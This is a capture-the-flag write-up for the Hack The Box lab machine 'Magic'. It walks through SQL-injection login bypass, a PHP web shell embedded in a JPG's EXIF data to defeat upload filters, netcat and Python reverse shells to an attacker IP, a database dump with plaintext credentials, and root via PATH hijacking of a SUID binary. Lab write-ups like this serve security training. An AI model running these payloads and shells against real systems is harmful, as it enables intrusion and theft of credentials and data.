HTB Write-up | Magic
Retired machine can be found here.
Scanning
As always, we start with some basic scanning which discloses only an instance of OpenSSH running on port 22 and an Apache web server running on port 80 - pretty typical stuff.
~ nmap -sV -sC -A magic.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-09 15:10 WEST
Nmap scan report for magic.htb (10.10.10.185)
Host is up (0.046s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
| 256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
|_ 256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Magic Portfolio
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.89 seconds
The website is just a simple image gallery, but there is a link to a login form on the bottom left.
Bypassing authentication was pretty straightforward with SQL Injection - I think this was my first attempt.
Once the login succeeds, we're redirected to an Upload page.
Bypassing Upload Filters
This upload feature only accepts JPG, JPEG or PNG files. This is validated by checking both file extension and MIME type, so uploading a PHP script directly is out of the question.
To get around these restrictions I ended up following this tutorial:
- Create a script that lets us execute any command on the machine, with the help of the passthru function:
2. Embed the script in a valid image using steghide:
$ steghide embed -cf dog.jpg -ef shell.php
3. Manipulate the EXIF data:
$ exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' dog.jpg
4. Change the file extension:
$ mv dog.jpg dog.php.jpg
Finally, we get an RCE, which we use to get a reverse shell:
http://10.10.10.185/images/uploads/dog.php.jpg?cmd=./nc%2010.10.15.114%204444%20-e%20/bin/sh
Getting User
Authenticated as wwwdata, we start poking around the web server files and find the credentials for the mySQL database, which then allows us to dump the contents of the app's database using the mysqldump binary:
~ /usr/bin/mysqldump --user=theseus --password=iamkingtheseus Magic login > /var/www/Magic/dbdump.sql
~ cat /var/www/Magic/dbdump.sq
...
INSERT INTO `login` VALUES (1,'admin','Th3s3usW4sK1ng');
...
We now have credentials for the user theseus but need to upgrade our shell to be able to authenticate, since SSH access is only enabled with RSA.
http://10.10.10.185/images/uploads/dog.php.jpg?cmd=/usr/bin/python3 -c 'import pty;import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.52",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'
With this interactive shell we can now authenticate via su.
www-data@ubuntu:/var/www/Magic/images/uploads$ su - theseus
Password: Th3s3usW4sK1ng
theseus@ubuntu:~$ Path to Root
Root was a lot more straightforward. We started by running SUID3NUM which found only one noteworthy file - /bin/sysinfo - so we investigate it.
~ strings /bin/sysinfo
...
setuid
...
====================Hardware Info====================
lshw -short
...
As we can see above, the file runs setuid at one point and right after it prints the output of the lshw (list hardware) binary. However, there is no path to this binary, which means we can alter the $PATH so that instead of the actual lshw binary, we can get root to run our fake lshw, which prints out the root flag:
theseus@ubuntu:~$ mkdir /tmp/.abc
theseus@ubuntu:~$ export PATH=/tmp/.abc:$PATH
theseus@ubuntu:~$ touch /tmp/.abc/lshw
theseus@ubuntu:~$ echo "cat /root/root.txt" >> /tmp/.abc/lshw
theseus@ubuntu:~$ chmod 777 /tmp/.abc/lshw
Now, we just need to run the sysinfo binary and in the output there's the root flag instead of the lshw output.